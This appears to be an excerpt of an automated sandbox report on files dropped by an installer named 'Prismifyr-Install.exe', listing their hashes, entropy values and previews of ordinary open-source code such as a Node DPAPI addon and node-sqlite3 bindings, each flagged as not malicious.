                                                                                                                                                                                                                                    SHA-512:6DAE672EA822A7DC5E42914DEF21C019C0FA8AEAF1C27C155B78312D8A33A63AE9A1910DD32B72760578671780B8C37B91FF5E1F6588F08C7FBAAFF80D8FB6FD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/*.. * Copyright (c) Microsoft Corporation. All rights reserved... * Licensed under the MIT License... */..#include <napi.h>....Napi::Value ProtectDataCommon(bool protect, const Napi::CallbackInfo& info);..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):327
                                                                                                                                                                                                                                    Entropy (8bit):5.0360262842304095
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:UKiBXVN+qO9/rOA4ghGakLdWYMV49MQFh2jBS0sff5czDGrnGqqE9:UKiBFN+qISA41c47Fh240sff56DOGR6
                                                                                                                                                                                                                                    MD5:C510E65EBCB2FA7C00712E770EC8C692
                                                                                                                                                                                                                                    SHA1:CA1EA3C8340DCF69F344D5EAA884631EEF37472B
                                                                                                                                                                                                                                    SHA-256:7C03CEC11C438B6D2512239477D9F1B45D6E16763122A3A36458AB339F50D3C4
                                                                                                                                                                                                                                    SHA-512:B0B312426B4409C80B45A0F3337069BE9870E050DC8B55184FB2BC63532C247089C8D35CBD1F12F0BD2BD38D581566FAA74A6469B548A1AD7D837285AD37C178
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/*.. * Copyright (c) Microsoft Corporation. All rights reserved... * Licensed under the MIT License... */....#include <napi.h>....void ProtectDataCommon(bool protect, const Napi::CallbackInfo& info)..{...Napi::Env env = info.Env();.....throw Napi::Error::New(env, "Data protection API is not available on macOs or Linux");..}..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2985
                                                                                                                                                                                                                                    Entropy (8bit):5.380194638326011
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:ADba++4Rh2gXJDirQYHggCyggtmHgg5kKddyJV42StupLLX1R2wtvqoeRrvB+qtT:ADOP4Og5D2QOggCyggtmHgg5kodyJG2g
                                                                                                                                                                                                                                    MD5:4A55597A2C7466278439452BB708B822
                                                                                                                                                                                                                                    SHA1:EAADCDA8F410F2DD1FD9522FD7A2221624DD1713
                                                                                                                                                                                                                                    SHA-256:DA37B02FB0BABB651244479EA019D229FFF1C41ECDE74BC06335B5E603D9B30E
                                                                                                                                                                                                                                    SHA-512:B20EFE8026DE41DD8C13C6F844455CACC13FA80BC3DD41FEF422FB178054A7C8D6F14AF8B1D6928E52648AB95A793AEE1F996DC2ACEEAD3AA8D317A99AAD23BB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/*.. * Copyright (c) Microsoft Corporation. All rights reserved... * Licensed under the MIT License... */.. // Implementation referenced from https://github.com/bradhugh/node-dpapi....#include <napi.h>..#include <uv.h>..#include <Windows.h>..#include <dpapi.h>..#include <functional>..#include <iostream>..#include <string>....Napi::Value ProtectDataCommon(bool protect, const Napi::CallbackInfo& info)..{...Napi::Env env = info.Env();.....if (info.Length() != 3) {....throw Napi::RangeError::New(env, "3 arguments are required");...}.....if (info[0].IsNull() || ....info[0].IsUndefined() || ....!info[0].IsTypedArray() || ....info[0].As<Napi::TypedArray>().TypedArrayType() != napi_uint8_array)...{....throw Napi::TypeError::New(env, "First argument, data, must be a valid Uint8Array");...}.....if (!info[1].IsNull() && ....(!info[1].IsTypedArray() || info[1].As<Napi::TypedArray>().TypedArrayType() != napi_uint8_array))...{....throw Napi::TypeError::New(env, "Second argument, optionalEntropy, mus
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):698
                                                                                                                                                                                                                                    Entropy (8bit):5.145975873802691
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:12:UKiBFN+qISA4ZAuIAmzNE34p3QhR4eZNQFdfD5xJ19LJ1C1L7j0:diDQqPdWpNE34p3U4eZ6dflp9HC1Lc
                                                                                                                                                                                                                                    MD5:88934CC736B505ADA3D07AFE22083568
                                                                                                                                                                                                                                    SHA1:6D1D112F4E7FC943DC5C9CE5AD2F32154AEB2F3A
                                                                                                                                                                                                                                    SHA-256:1ADA21451BAB629832372D519E366BFB08C80FACFEFE5A40C76A4F10A697C905
                                                                                                                                                                                                                                    SHA-512:9F45386CBA32D13A50360916B0C2F240E43CBA5983A86AD80F85C75CD8E6AC2C6B931992842A736E84E234B91FC46A7A66824A3A2748F474CF1BBD22EC138A99
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/*.. * Copyright (c) Microsoft Corporation. All rights reserved... * Licensed under the MIT License... */....#include <napi.h>..#include <uv.h>..#include "dpapi_addon.h"....Napi::Value protectData(const Napi::CallbackInfo& info)..{...return ProtectDataCommon(true, info);..}....Napi::Value unprotectData(const Napi::CallbackInfo& info)..{...return ProtectDataCommon(false, info);..}....Napi::Object init(Napi::Env env, Napi::Object exports) {...exports.Set(Napi::String::New(env, "protectData"),....Napi::Function::New(env, protectData));.....exports.Set(Napi::String::New(env, "unprotectData"),....Napi::Function::New(env, unprotectData));......return exports;..}....NODE_API_MODULE(dpapi, init)..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1556
                                                                                                                                                                                                                                    Entropy (8bit):4.627024078278056
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:diDQqBmWAjFSfgO9ceYcceCorOJGf2l/ceYUl/ceCorOJFmawobtGDw:ADbIWWFSfgAvpv5r+GeFvDFv5r+fbtOw
                                                                                                                                                                                                                                    MD5:EAE2E98D30B688201CDB21DBA195CAA7
                                                                                                                                                                                                                                    SHA1:2E023DAAE996D1562D77DB748BBE488FF5B8FFC9
                                                                                                                                                                                                                                    SHA-256:76C7B4EF93B24D30FFDA6DE645AECBF2859CE44053B48D71750AEEB92A0ED82A
                                                                                                                                                                                                                                    SHA-512:8411E9AC726A02C3ADC2EE8315166BCD026E6418D79118A130E8E4B952E585AA92324D526D45812238593A30211DA6FA58DC0E9899FC6B6DF17A75B711EA3E3E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:/*.. * Copyright (c) Microsoft Corporation. All rights reserved... * Licensed under the MIT License... */....import Dpapi from "../lib";..import { platform } from "process";....// DPAPI is only available on windows..if(platform === "win32"){.. describe('Test DPAPI addon', () => {.. test('Protect and Unprotect data', () => {.. const data = Buffer.from("DPAPITestString");.... const encryptedData = Dpapi.protectData(data, null, "CurrentUser");.. const decryptedData = Dpapi.unprotectData(encryptedData, null, "CurrentUser");.. expect(decryptedData).toEqual(data);.. });.... test('Protect and Unprotect data with entropy', () => {.. const data = Buffer.from("DPAPITestString");.. const entropy = Buffer.from("entropy");.... const encryptedData = Dpapi.protectData(data, entropy, "CurrentUser");.. const decryptedData = Dpapi.unprotectData(encryptedData, entropy, "CurrentUser");..
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1725
                                                                                                                                                                                                                                    Entropy (8bit):4.570601989842644
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:XnbrxZ0k0mlxe3wmTXya45ZjSjjYddQndGE6ZmdF0BW:Lrwfj3lTXya+jSjjYdqdv28
                                                                                                                                                                                                                                    MD5:B18910876AFA5BE79DC709E0B314108E
                                                                                                                                                                                                                                    SHA1:FBD12AA3A25EAA0EA9883C49282029BBB9A9B1AD
                                                                                                                                                                                                                                    SHA-256:82C0FFFCCC54EF10231BE8C7E190FEB8FEEA44EFC01B4ECFE12E4D8A0ECFB20D
                                                                                                                                                                                                                                    SHA-512:20A8EF66EC345D0F90416ACF2A288D22C3F7B44B1E1A747C5AD4C9196CBBD6CA51683650D90AFEA97F33F847C8FD5D8FD9221CE7E0A7F4494E58288F8D80BAB7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{. "includes": [ "deps/common-sqlite.gypi" ],. "variables": {. "sqlite%":"internal",. "sqlite_libname%":"sqlite3",. "module_name": "node_sqlite3",. },. "targets": [. {. "target_name": "<(module_name)",. "cflags!": [ "-fno-exceptions" ],. "cflags_cc!": [ "-fno-exceptions" ],. "xcode_settings": { "GCC_ENABLE_CPP_EXCEPTIONS": "YES",. "CLANG_CXX_LIBRARY": "libc++",. "MACOSX_DEPLOYMENT_TARGET": "10.7",. },. "msvs_settings": {. "VCCLCompilerTool": { "ExceptionHandling": 1 },. },. "include_dirs": [. "<!@(node -p \"require('node-addon-api').include\")"],. "conditions": [. ["sqlite != 'internal'", {. "include_dirs": [. "<!@(node -p \"require('node-addon-api').include\")", "<(sqlite)/include" ],. "libraries": [. "-l<(sqlite_libname)". ],. "conditions": [. [ "OS=='linux'", {"libraries+":["-Wl,-rpath=<@(sqlite)/lib
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1892864
                                                                                                                                                                                                                                    Entropy (8bit):6.574510854408502
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                                                                                                                                                                                                                    MD5:66A65322C9D362A23CF3D3F7735D5430
                                                                                                                                                                                                                                    SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                                                                                                                                                                                                                    SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                                                                                                                                                                                                                    SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1322
                                                                                                                                                                                                                                    Entropy (8bit):4.269649469997749
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:4FzFrBZ5w7rKBFrI/3+N1+QmU2fFqySKEFI/3EBm0ZJb/0+QmU2fFqyae:4FzF1ZSrKBy/m1+zU2MySKEy/EQgq+zx
                                                                                                                                                                                                                                    MD5:0AD55AE01864DF3767D7B61678BD326E
                                                                                                                                                                                                                                    SHA1:FFEDCC19095FD54F8619F00F55074F275CEDDFD6
                                                                                                                                                                                                                                    SHA-256:4D65F2899FB54955218F28EC358A2CAD2C2074A7B43F862933C6A35E69AE0632
                                                                                                                                                                                                                                    SHA-512:AAEE895D110D67E87ED1E8ED6557B060A0575F466A947A4F59CC9D111381E1AF6AA54D432233716C78F146168D548A726FED1EAB2B3F09BB71E0AE7F4FDC69E3
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{. 'variables': {. 'sqlite_version%':'3440200',. "toolset%":'',. },. 'target_defaults': {. 'default_configuration': 'Release',. 'conditions': [. [ 'toolset!=""', {. 'msbuild_toolset':'<(toolset)'. }]. ],. 'configurations': {. 'Debug': {. 'defines!': [. 'NDEBUG'. ],. 'cflags_cc!': [. '-O3',. '-Os',. '-DNDEBUG'. ],. 'xcode_settings': {. 'OTHER_CPLUSPLUSFLAGS!': [. '-O3',. '-Os',. '-DDEBUG'. ],. 'GCC_OPTIMIZATION_LEVEL': '0',. 'GCC_GENERATE_DEBUGGING_SYMBOLS': 'YES'. },. 'msvs_settings': {. 'VCCLCompilerTool': {. 'ExceptionHandling': 1, # /EHsc. }. }. },. 'Release': {. 'defines': [. 'NDEBUG'. ],. 'xcode_settings': {. 'OTHER_CPLUSPLUSFLAGS!': [. '-Os',. '-O2'. ],. 'GCC_
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):224
                                                                                                                                                                                                                                    Entropy (8bit):4.702985304607579
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:5XFbUlycyp1wNQXkIY+lGAWMbVLWINHVY+lGAWM9wvyxXvn+LMOfr+HIdUyfFahX:5E360iGzMFNVPGzM+Ev+4OTdUyfF1w
                                                                                                                                                                                                                                    MD5:F0A82A6A6043BF87899114337C67DF6C
                                                                                                                                                                                                                                    SHA1:A906C146EB0A359742FF85C1D96A095BD0DD95FD
                                                                                                                                                                                                                                    SHA-256:5BE353D29C0FABEA29CFD34448C196DA9506009C0B20FDE55E01D4191941DD74
                                                                                                                                                                                                                                    SHA-512:D26879F890226808D9BD2644C5CA85CC339760E86B330212505706E5749464FAFAD1CB5F018C59A8F034D68D327CD3FA5234CEAC0677DE1AC9AE09039F574240
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:const tar = require("tar");.const path = require("path");.const tarball = path.resolve(process.argv[2]);.const dirname = path.resolve(process.argv[3]);..tar.extract({. sync: true,. file: tarball,. cwd: dirname,.});.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 12625920
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3204841
                                                                                                                                                                                                                                    Entropy (8bit):7.999490325438607
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:49152:ZROqVtTXPm/3DfYnW3vYkidsYIzCD8BJXKU0UzHOu67Rs5q9CVxaPdWKAz:/mDsWfYkfO8JXZzHuW5qqx8h0
                                                                                                                                                                                                                                    MD5:C02F40FD4F809CED95096250ADC5764A
                                                                                                                                                                                                                                    SHA1:8398DD159F3A1FD8F1C5EDF02C687512EAAB69E4
                                                                                                                                                                                                                                    SHA-256:1C6719A148BC41CF0F2BBBE3926D7CE3F5CA09D878F1246FCC20767B175BB407
                                                                                                                                                                                                                                    SHA-512:59AD55DF15EB84430F5286DB2E5CEDDD6CA1FC207A6343546A365C0C1BAF20258E96C53D2AD48B50385608D03DE09A692AE834CB78A39D1A48CB36A05722E402
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:...........[{W.....:.....B.!..c.[.8..I...1V.%...q.~...{fd..H.r..].Z...g.=.=c..0He....G....f.^.V...O.....}....O.|S.........7..Fu......H|..M...w.[......Q.../.O.P~.5x..>.....[......V..Q.*....?..... .*j.../.w2....0..(q5....c...F>.R7.E..R\,;..`.^.#...z..C..Q.n.....8.7.@o.Y...R.*j..=*....O...x.^....1.pS.Z...+3ZA..H.f...E?..r&.....7;....|.`0..G...$>O...!.W.....S.H...4...T. . ......g...bE:."..X.x./.G..@F2qCq2...':.'#%....E...|..&|..]!..'.N...Px.e"...Z..7...M.Co&uN./.......?.H.t....H1Ur8....c..v...i_4.^...n.q......(F....R0..............n.9f4..;..k....?j.zb..+......FW..vO.{...=IHI...C..p....J......Y.{).............$bg.G.L!..Y...C..u....Q.N.N.ruuU......j ..i....j".......-.i|..."..&.DN...!...MR...v...f............z(.y.%P4.e_g...3...N}....R....&......S.%48.*.F..c%.)...x..Z....{..'.t....I.Bx..e..]....p.....08.7.F.Fb.c;.d....#...N..y)E$.....VN..):.D......D(P2.ir..L.(.s....$P.C.D...P.._.l......d.`w@:...J^.\s.e.i.....P......!..a[.....4..&.#.}~...6c..A.a
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3021
                                                                                                                                                                                                                                    Entropy (8bit):4.679912791477012
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:RnwwZfKrK3zU2oKHzU2dWDU24L4Sq6LdZHDQ3JD7Sx+6xPByrEieDH+hydsIbAAh:SwZyrK3zPoKHzPdWDP4L4SddZHE3JXSz
                                                                                                                                                                                                                                    MD5:0E4D1D898D697EC33A9AD8A27F0483BF
                                                                                                                                                                                                                                    SHA1:1505F707A17F35723CD268744C189D8DF47BB3A3
                                                                                                                                                                                                                                    SHA-256:8793F62B1133892BA376D18A15F552EF12B1E016F7E5DF32FFB7279B760C11BD
                                                                                                                                                                                                                                    SHA-512:C530ABA70E5555A27D547562D8B826B186540068AF9B4CCD01483EC39F083A991AC11D0CC66F40ACAA8B03D774080F227EE705A38995F356A14ABE6E5F97B545
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{. 'includes': [ 'common-sqlite.gypi' ],.. 'variables': {. 'sqlite_magic%': '',. },.. 'target_defaults': {. 'default_configuration': 'Release',. 'cflags':[. '-std=c99'. ],. 'configurations': {. 'Debug': {. 'defines': [ 'DEBUG', '_DEBUG' ],. 'msvs_settings': {. 'VCCLCompilerTool': {. 'RuntimeLibrary': 1, # static debug. },. },. },. 'Release': {. 'defines': [ 'NDEBUG' ],. 'msvs_settings': {. 'VCCLCompilerTool': {. 'RuntimeLibrary': 0, # static release. },. },. }. },. 'msvs_settings': {. 'VCCLCompilerTool': {. },. 'VCLibrarianTool': {. },. 'VCLinkerTool': {. 'GenerateDebugInformation': 'true',. },. },. 'conditions': [. ['OS == "win"', {. 'defines': [. 'WIN32'. ],. }]. ],. },.. 'targets': [. {. 'target_name': 'action_before_build',. 'type': 'none',.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):59
                                                                                                                                                                                                                                    Entropy (8bit):4.439231872095227
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:3BBBbJvHEb9UJMRzL+BMev:xBBdHWDRnA
                                                                                                                                                                                                                                    MD5:8582B2DCAED9C5A6F3B7CFE150545254
                                                                                                                                                                                                                                    SHA1:14667874E0BFBE4FFC951F3E4BEC7C5CF44E5A81
                                                                                                                                                                                                                                    SHA-256:762C7A74D7F92860A3873487B68E89F654A21D2AAEAE9524EAB5DE9C65E66A9C
                                                                                                                                                                                                                                    SHA-512:22EC4DF7697322B23AE2E73C692ED5C925D50FDE2B7E72BFC2D5DD873E2DA51834B920DEA7C67CCA5733E8A3F5E603805762E8BE238C651AA40290452843411D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:module.exports = require('bindings')('node_sqlite3.node');.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):7163
                                                                                                                                                                                                                                    Entropy (8bit):5.138163315307549
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:UIxYINTr7I/rsKlMkZ/YNpApVYP/pVPHztXpepCrilvt6wqofIoGoQscFsMR:UyYuSgPTK6wqkNsR
                                                                                                                                                                                                                                    MD5:EF8EF3BD8E4332D3FC264F0ADF877B8D
                                                                                                                                                                                                                                    SHA1:7E4D52F5E397ED1D51DCCED24ACE9A5E00F91500
                                                                                                                                                                                                                                    SHA-256:A39DB87A3A3AA954AC3F6553B9FBFC642EB22BEF7586CC1F0559E676AA073FA8
                                                                                                                                                                                                                                    SHA-512:5E456EE839F988FED95F816278A3DA6998C8757403B98351C4BC26CA197146747B7A20E0C1A702818053547C4D9F9BCF9607BB778C88CA7CF22F21D9C9B4B091
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:// Type definitions for sqlite3.// Project: http://github.com/tryghost/node-sqlite3../// <reference types="node" />..import events = require("events");..export const OPEN_READONLY: number;.export const OPEN_READWRITE: number;.export const OPEN_CREATE: number;.export const OPEN_FULLMUTEX: number;.export const OPEN_SHAREDCACHE: number;.export const OPEN_PRIVATECACHE: number;.export const OPEN_URI: number;..export const VERSION: string;.export const SOURCE_ID: string;.export const VERSION_NUMBER: number;..export const OK: number;.export const ERROR: number;.export const INTERNAL: number;.export const PERM: number;.export const ABORT: number;.export const BUSY: number;.export const LOCKED: number;.export const NOMEM: number;.export const READONLY: number;.export const INTERRUPT: number.export const IOERR: number;.export const CORRUPT: number.export const NOTFOUND: number;.export const FULL: number;.export const CANTOPEN: number;.export const PROTOCOL: number;.export const EMPTY: number;.ex
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):6365
                                                                                                                                                                                                                                    Entropy (8bit):4.5893883775756406
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:QoM2Wd0WmO6pM+tPtVRhoh3hG/h1goWPQfAcCy7gPQbQwZQiR893+9dY:npM0I6aPkd/K
                                                                                                                                                                                                                                    MD5:275019A4199A84CFD18ABD0F1AE497AA
                                                                                                                                                                                                                                    SHA1:8601683F9B6206E525E4A087A7CCA40D07828FD8
                                                                                                                                                                                                                                    SHA-256:8D6B400AE7F69A80D0CDD37A968D7B9A913661FA53475E5B8DE49DDA21684973
                                                                                                                                                                                                                                    SHA-512:6422249CCD710973F15D1242A8156D98FA8BDEA820012DF669E5363C50C5D8492D21FFEFCDFA05B46C3C18033DDE30F03349E880A4943FEDA8D1EE3C00F952B0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:const path = require('path');.const sqlite3 = require('./sqlite3-binding.js');.const EventEmitter = require('events').EventEmitter;.module.exports = exports = sqlite3;..function normalizeMethod (fn) {. return function (sql) {. let errBack;. const args = Array.prototype.slice.call(arguments, 1);.. if (typeof args[args.length - 1] === 'function') {. const callback = args[args.length - 1];. errBack = function(err) {. if (err) {. callback(err);. }. };. }. const statement = new Statement(this, sql, errBack);. return fn.call(this, statement, args);. };.}..function inherits(target, source) {. for (const k in source.prototype). target.prototype[k] = source.prototype[k];.}..sqlite3.cached = {. Database: function(file, a, b) {. if (file === '' || file === ':memory:') {. // Don't cache special databases.. return new Database(fi
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1357
                                                                                                                                                                                                                                    Entropy (8bit):4.369532219363835
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:aXbwFF8Sg5eV71awdNDm+vl0dU6LNS0Gl9INNAO+BIynqRiMqUc0Zz:Sbw4SiS17dN7d0LLUfI0OWIynqRiMqUr
                                                                                                                                                                                                                                    MD5:E5C2DE3C74BC66D4906BB34591859A5F
                                                                                                                                                                                                                                    SHA1:37EC527D9798D43898108080506126B4146334E7
                                                                                                                                                                                                                                    SHA-256:D06CAEC6136120C6FB7EE3681B1CA949E8B634E747EA8D3080C90F35AEB7728F
                                                                                                                                                                                                                                    SHA-512:E250E53DAE618929CBF3CB2F1084A105D3A78BDFB6BB29E290F63A1FD5FBB5B2FAB934AD16BC285E245D749A90C84BDC72FDC1A77AF912B7356C18B0B197FBE5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:// Inspired by https://github.com/tlrobinson/long-stack-traces.const util = require('util');..function extendTrace(object, property, pos) {. const old = object[property];. object[property] = function() {. const error = new Error();. const name = object.constructor.name + '#' + property + '(' +. Array.prototype.slice.call(arguments).map(function(el) {. return util.inspect(el, false, 0);. }).join(', ') + ')';.. if (typeof pos === 'undefined') pos = -1;. if (pos < 0) pos += arguments.length;. const cb = arguments[pos];. if (typeof arguments[pos] === 'function') {. arguments[pos] = function replacement() {. const err = arguments[0];. if (err && err.stack && !err.__augmented) {. err.stack = filter(err).join('\n');. err.stack += '\n--> in ' + name;. err.stack += '\n' + filter(error).slice(1).join('\n');.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2189
                                                                                                                                                                                                                                    Entropy (8bit):4.910536087911446
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:atuR+HnA7Ydf7aKCRU0dmGiW/o2Ygy3rj/cirPRpg0q:RsHnpjXixY2o2Fy3rj//rPRp0
                                                                                                                                                                                                                                    MD5:D0D759C39758174ECA4580E6A04A2C15
                                                                                                                                                                                                                                    SHA1:97366BB2FA9D63BB9660B3D130EFB6D37A6B80EF
                                                                                                                                                                                                                                    SHA-256:C782C19485B0026E209076A236484A62885CB3A0828322A2936043230ED1EC41
                                                                                                                                                                                                                                    SHA-512:B1F728883023D93EA46E72278A4DFF96BF6489E37471F8804BD7D6C52F21B7EE284803CEC589C941701A590458671F7C53D63F0F75500843EE25D8D4E60629D0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{. "name": "sqlite3",. "description": "Asynchronous, non-blocking SQLite3 bindings",. "version": "5.1.7",. "homepage": "https://github.com/TryGhost/node-sqlite3",. "author": {. "name": "Mapbox",. "url": "https://mapbox.com/". },. "binary": {. "napi_versions": [. 3,. 6. ]. },. "contributors": [. "Daniel Lockyer <hi@daniellockyer.com>",. "Konstantin K.fer <mail@kkaefer.com>",. "Dane Springmeyer <dane@mapbox.com>",. "Will White <will@mapbox.com>",. "Orlando Vazquez <ovazquez@gmail.com>",. "Artem Kustikov <kustikoff@gmail.com>",. "Eric Fredricksen <efredricksen@gmail.com>",. "John Wright <mrjjwright@gmail.com>",. "Ryan Dahl <ry@tinyclouds.org>",. "Tom MacWright <tom@mapbox.com>",. "Carter Thaxton <carter.thaxton@gmail.com>",. "Audrius Ka.ukauskas <audrius@neutrino.lt>",. "Johannes Schauer <josch@pyneo.org>",. "Nathan Rajlich <nathan@tootallnate.net>",. "AJ ONeal <coolaj86@gmail.com>",. "Mithgol",. "Ben Noor
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Prismifyr-Install.exe
                                                                                                                                                                                                                                    File Type:C++ source, ASCII text
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                                                                    Entropy (8bit):4.930561121765868
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:hxZDjeG5pIdsijad2eLD8FlFb26iKl3/g6MeBos:hxMupLbj8FlFb26iKl3VdT
                                                                                                                                                                                                                                    MD5:E8C5E5C02D87E6AF4455FF2C59C3588B
                                                                                                                                                                                                                                    SHA1:A0DE928C621BB9A71BA9CF002E0F0726E4DB7C0E
                                                                                                                                                                                                                                    SHA-256:CCE55C56B41CB493EBD43B232FF8FFC9F5A180F5BAB2D10372ECA6780EB105F6
                                                                                                                                                                                                                                    SHA-512:ED96889E0D1D5263FB8FED7A4966905B9812C007FBB04B733CADBE84EDC7179015B9967FF5F48816FF2C97ACF4A5B4792A35CEE1F8FCE23E5FDC797F8EE0C762
                                                                                                                                                                                                                                    Malicious:false
